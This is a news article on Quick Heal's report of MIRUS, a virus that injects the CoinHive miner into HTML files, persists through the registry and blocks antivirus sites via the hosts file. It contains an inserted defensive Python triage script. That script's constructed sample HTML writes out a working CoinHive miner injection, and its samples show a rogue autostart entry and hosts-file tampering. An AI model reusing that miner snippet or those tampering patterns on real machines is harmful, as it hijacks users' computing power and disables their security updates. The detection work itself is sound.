
MIRUS malware infects HTML files with CoinHive scripts: Quick Heal

Prabha Kylas, March 05, 2018 | Updated on March 07, 2018

Sanjay Katkar, Chief Technology Officer, Quick Heal Technologies

Researchers at Quick Heal Security Labs have reported a cryptomining malware, MIRUS, that injects the CoinHive JavaScript miner into HTML files and also infects executable files with the .exe, .com, .scr and .pif extensions.

A researcher pointed out that MIRUS is the latest malware to use the CoinHive cryptomining script as its payload.

In this case, malware authors seem to capitalise on scripts such as CoinHive to consume compute power of visitors’ machines for mining crypto-currencies like Monero.

The research team observed, in February, an average of 20,000 instances per day of cryptomining malware activity on infected systems.

"The rising popularity of cryptocurrencies has attracted cybercriminals towards cryptocurrency mining. More and more hacking groups have diverted their attention to creating malware that can use the resources of infected endpoints to mine cryptocurrency.

"This trend will keep growing looking at the interest cryptocurrencies are generating globally and the crazy valuations they are trading at," said Sanjay Katkar, Joint Managing Director and CTO, Quick Heal Technologies Ltd.

The malware spotted by Quick Heal also injects the script into HTML files so that it is “consistently run” on the infected system: when the user opens an infected HTML file, mining begins, and it stops only when the page is closed. While running, the script drives CPU usage to 100 per cent for mining.

The malware also adds two registry entries so that its code executes every time the system starts. The Windows Registry is a database that stores configuration settings of applications and of Windows itself, user account credentials, details of device drivers and other system data.

The report also notes that the virus tampers with the Windows hosts file, whose entries take precedence over DNS resolution on that computer. As a result, antivirus vendors' websites may become inaccessible and some antivirus software may fail to receive updates.
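The three behaviours above (the HTML injection, the autostart registry change and the hosts-file tampering) each leave an artifact that can be checked offline from files collected off a suspect machine. The following Python script is an added example, not Quick Heal's code or anything taken from MIRUS: the sample HTML, the .reg export and the hosts file are constructed, the antivirus domain watch-list is illustrative, and the choice of the Run/RunOnce keys is an assumption, since the report does not name the registry key MIRUS modifies. The CoinHive indicators (the loader URL and the CoinHive.Anonymous/CoinHive.User constructors) are the public CoinHive browser API of the time.

```python
"""Offline triage for the MIRUS behaviours described above: CoinHive
miner injected into HTML files, autostart registry values, and hosts-file
overrides of antivirus domains.  Added example, not Quick Heal's code.
All sample data below is constructed for illustration."""
import re
from typing import Dict, List, Tuple

# CoinHive indicators: the public loader URL and the miner constructors.
COINHIVE_PATTERNS = [
    re.compile(r"coinhive\.com/lib/coinhive(?:\.min)?\.js", re.I),
    re.compile(r"CoinHive\.(?:Anonymous|User)\s*\(", re.I),
]


def find_coinhive_injection(html: str) -> List[str]:
    """Return the CoinHive indicator strings present in an HTML document."""
    hits = []
    for pattern in COINHIVE_PATTERNS:
        match = pattern.search(html)
        if match:
            hits.append(match.group(0))
    return hits


# Assumption: persistence via the Run/RunOnce keys, read from a .reg export.
RUN_KEY_RE = re.compile(r"^\[(HKEY_[^\]]*\\CurrentVersion\\Run(?:Once)?)\]$", re.I)
VALUE_RE = re.compile(r'^"([^"]+)"="(.*)"$')


def autostart_entries(reg_text: str) -> List[Tuple[str, str, str]]:
    """(key, value name, command) for every string value under a Run/RunOnce key."""
    entries, key = [], None
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("["):               # a new key section
            match = RUN_KEY_RE.match(line)
            key = match.group(1) if match else None
            continue
        if key:
            match = VALUE_RE.match(line)
            if match:
                # .reg escapes backslashes and quotes with a backslash
                command = re.sub(r'\\(["\\])', r"\1", match.group(2))
                entries.append((key, match.group(1), command))
    return entries


# Illustrative watch-list; a clean hosts file has no reason to pin these.
AV_DOMAINS = ("quickheal.com", "kaspersky.com", "symantec.com",
              "mcafee.com", "eset.com", "avast.com")


def parse_hosts(text: str) -> List[Tuple[str, str]]:
    """Parse hosts-file text into (ip, hostname) pairs, ignoring comments."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()    # drop trailing comments
        if not line:
            continue
        ip, *names = line.split()
        entries.extend((ip, name.lower()) for name in names)
    return entries


def suspicious_hosts_entries(text: str) -> List[Tuple[str, str]]:
    """Hosts entries that pin a watched antivirus domain (or a subdomain).
    Whether the target is loopback or an attacker-controlled address, the
    effect is the same: the vendor's update servers become unreachable."""
    return [(ip, name) for ip, name in parse_hosts(text)
            if any(name == d or name.endswith("." + d) for d in AV_DOMAINS)]


# Constructed samples (not real MIRUS artifacts).
SAMPLE_HTML = """<html><head><title>Quarterly report</title>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('EXAMPLESITEKEY00000000000000000');
  miner.start();
</script></head><body>Report body</body></html>"""

SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"svchost"="C:\\Users\\alice\\AppData\\Roaming\\svchost.exe"
"""

SAMPLE_HOSTS = """# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
127.0.0.1       www.quickheal.com quickheal.com   # injected
192.0.2.10      liveupdate.symantec.com
"""


def triage(html: str, reg_text: str, hosts_text: str) -> Dict[str, list]:
    """Summarise all three checks for an analyst."""
    return {
        "coinhive": find_coinhive_injection(html),
        "autostart": autostart_entries(reg_text),
        "hosts": suspicious_hosts_entries(hosts_text),
    }


if __name__ == "__main__":
    for check, findings in triage(SAMPLE_HTML, SAMPLE_REG, SAMPLE_HOSTS).items():
        print(f"{check}: {findings}")
```

The registry check deliberately lists every autostart value rather than guessing which one is malicious; an analyst compares the list against a known-good baseline (here the user-profile svchost.exe is the obvious outlier, since the genuine binary lives under the Windows directory). On a live host the same three inputs come from the collected HTML files, `reg export` of the Run keys, and `%SystemRoot%\System32\drivers\etc\hosts`.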

Quick Heal’s threat report 2018 identifies around 10 million cryptocurrency mining scripts and 14 million hits of cryptocurrency miners on customers’ systems in 2017. The report calls out JavaScript as one of the most widely used script formats.

Updates: The average cryptomining scripts activity per day as observed by the firm and CTO's response have been added.

